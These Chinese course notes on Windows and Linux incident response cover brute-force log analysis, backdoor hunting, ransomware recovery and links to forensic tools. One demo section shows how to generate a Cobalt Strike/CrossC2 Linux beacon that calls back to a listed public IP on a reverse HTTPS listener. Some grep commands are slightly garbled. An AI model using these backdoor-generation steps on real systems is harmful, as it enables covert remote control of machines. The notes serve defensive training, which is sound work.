74 应急响应-win&linux分析后门&勒索病毒&攻击

操作系统（windows，linux）应急响应

1.常见危害: 暴力破解，漏洞利用，流量攻击，木马控制（webshell，PC木马等），病毒感染（挖矿，蠕虫，勒索等）

流量攻击：只是会对数据和服务器的正常运转、运行会受到干扰，但是他不会把你服务器上的权限和敏感的东西泄露出去，也不会造成服务器上的数据和权限丢失

对方通过一些漏洞或者权限得到服务器的权限之后，实现木马或者病毒上面的一些感染，来危害到服务器的正常运行，导致服务器异常

pc木马（控制系统的木马）、网站木马，根据当前操作系统windows和linux、mac os，这里网上都有相对应的系统，还有一些app的，这里我们主要介绍的是pc

这个木马需要用到第三方软件，因为现在出现了很多免杀木马，有时候杀毒软件查杀不到，这个时候就需要借助于我们人为的去分析，那些程序在运行过程中有异常，来判定出这个程序有后门，并且找到这个后门一步步到服务器上面去

当前在我们互联网比较出名的挖矿程序和勒索

2.常见分析: 计算机账户，端口，进程，网络，启动，服务，任务，文件等安全问题

看一下计算机上面有没有一些新增的，账户有没有异常，一般攻击者会留一个后门账户，方便他下次的连接，这个是有一定经验的

判断出服务器上端口的连接情况，有没有一些后门进程，对外部的一些连接

还有些进程信息能直接了然的看到，系统自带的进程，第三方应用的进程，还有一些不知道的进程，来判定出有没有一些可疑进程在执行

网络和端口差不多，根据当前的网络环境来判断

服务器在重启之后，会自动加载一些程序或者应用

木马在控制的时候为了保持权限一直存在，当服务器重启之后，木马会失效，但是这个木马为了长期控制，他就会把木马写到系统项和服务名，或者是注册表里面，当服务器重启之后，还会加载这些东西，那么木马会再去重新运行上线，实现重新控制，所以这些地方真的要去看

看一下文件有没有被泄露，有没有被更改权限，有没有被进行恶意的删除，那这些东西都要进行分析的

常见日志类别及存储

Windows，Linux

我们一定要借助日志，这攻击是如何实现的，日志里面有些类别，有给予这个应用服务器日志、系统日志，比如一些登录事件，什么时候登录过这台服务器，什么时候注销过这台服务器，这些信息都在日志里面有保存，进一步分析攻击者在服务器上做了那些事情，存储表示日志会储存在那些地方，能不能修改

补充资料：

应急响应大合集：https://xz.aliyun.com/t/485
史上最全Windows安全工具锦集：https://www.secpulse.com/archives/114019.html
系统内部：https://learn.microsoft.com/en-us/sysinternals/
提供windows自带工具，好处在于用起来非常方便，不会涉及到杀毒软件误杀，运行不了的情况

病毒分析

PCHunter：http://www.xuetr.com
火绒剑：https://www.huorong.cn
Process Explorer：https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker：https://processhacker.sourceforge.io/downloads.php
autoruns：https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL：https://www.bleepingcomputer.com/download/otl/
SysInspector：http://download.eset.com.cn/download/detail/?product=sysinspector

病毒查杀

卡巴斯基：http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
大蜘蛛：http://free.drweb.ru/download+cureit+free
火绒安全软件：https://www.huorong.cn
360 杀毒：http://sd.360.cn/download_center.html

病毒动态

CVERC-国家计算机病毒应急处理中心：http://www.cverc.org.cn
微步在线威胁情报社区：https://x.threatbook.cn
火绒安全论坛：http://bbs.huorong.cn/forum-59-1.html
爱毒霸社区：http://bbs.duba.net
腾讯电脑管家：http://bbs.guanjia.qq.com/forum-2-1.html

在线病毒扫描网站

http://www.virscan.org / /多引擎在线病毒扫描网
https://habo.qq.com / /腾讯哈勃分析系统
https://virusscan.jotti.org / /Jotti 恶意软件扫描系统
http://www.scanvir.com //计算机病毒、手机病毒、可疑文件分析

演示案例

攻击响应-暴力破解(RDP,SSH)-Win,Linux

Windows-LogFusion载入查看：
事件归类，事件ID，事件状态等，参考百度资料

Linux-grep筛选：
1、统计了下日志，确认服务器遭受多少次暴力破解

grep -o "Failed password" /var/log/secureluniq -c
1

2、输出登录爆破的第一行和最后一行，确认爆破时间范围：

grep "Failed password" /var/log/secure l head -1
grep "Failed password" /var/log/secure l tail -1
1
2

3、进一步定位有哪些IP在爆破?

我们不确定对方采用什么攻击方式，所以我们都要看，有可能是漏洞有可能是暴力破解，暴力破解就跟日志挂的会比较深入一点，因为漏洞会有些日志记录不上

控制响应-后门木马(Webshell,PC)-Win,Linux

windows: 默认配置测试
linux借助CrossC2项目: netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon

参考过程: http://www.adminxe.com/1287.html
1.项目上传至服务端目录，给予执行权限
2.配置监听器：
windows/beacon_https/reverse_https 阿里云记得端口放行
3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通过网络监听工具及windows日志分析或执行记录查找后门问题

windows上面的一个木马，我们用到的控制木马是cs，常见安全攻击工具cs，然后去分析一下这个木马，如何去判定他，在实战情况下，我们可以借助杀毒软件，来对服务器的其它文件进行扫描，探针有没有可疑的木马病毒

cs面向的是windows的渗透项目，但是后期经过其它人的更改，后面也支持linux的上线
cs支持情况

危害响应-病毒感染(勒索WannaCry)-Windows

详细说明中毒表现及恢复指南
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html

做勒索病毒查看演示的话，一定要小心在小心，本机没有装补丁或者没有拦截可能自己感染，那就很尴尬

中毒的表现就是会把你所有的文档文件都给改了，突然一下弹了个窗口，然后就变成这样了，文件啥都看不到了

编辑打开就是txt内容，但这里打开就会变成这样子，让你交钱解密

病毒样本，网上也能下到，演示的话，最好是放到虚拟机上去运行，不要放在本机上面搞，到时候又要重装电脑搞一些东西

我们不是研究病毒，研究逆向这块的，他的技术属于逆向这块的技术

在线解密，把我们上传的留言文件，还有上传加密文件，因为它会对文档进行加密，办公的一些文档资料全部加密了，打不开

能不能解密成功，就看勒索病毒厉不厉害，再就看平台支不支持

有些勒索病毒实在是没有办法，这个时候可以尝试找花钱的网站去尝试一下，当然花钱也不一定能够搞出来

有的是基于漏洞的，ms17-010，还有一种是没有打补丁，系统本身存在系统漏洞；自己在网站上面乱七八遭的乱下，导致的

不要乱下，长期打补丁，并且更新杀毒软件，在服务器上保持干净，不要乱下一些乱七八遭的软件，中毒还有一种情况是被别人给危害了，可能你的内网主机，之前勒索病毒爆发的时候，出过爆发漏洞，然后进行内网渗透，自带感染，但是我们要想到，他是基于漏洞的，提前做好补丁，安装好防护的话，其实是能够直接解决这个问题的，总的来说就是管理员的疏忽，没有定期的更新补丁，做好漏洞的防范，就不会导致这样的事情

解密就是免费工具或者花钱

自动化响应检测-Gscan多重功能脚本测试-Linux

GScan文件对比，可以去学习一下

木马和病毒是两方面，木马主要是为了控制，病毒是一个恶意的程序，他会把你服务器上正常的东西搞得不正常，木马不会影响到你正常的情况，你的服务器会被他实时监控

下载地址

https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon/
https://github.com/grayddq/GScan/
https://bbs.pediy.com/thread-217586-1.htm
https://www.nomoreransom.org/zh/index.html
https://docs.microsoft.com/en-us/sysinternals/
https://www.secpulse.com/archives/114019.html
https://pan.baidu.com/s/1tQS1mUelmEh3168AL7yXGg 提取码: xiao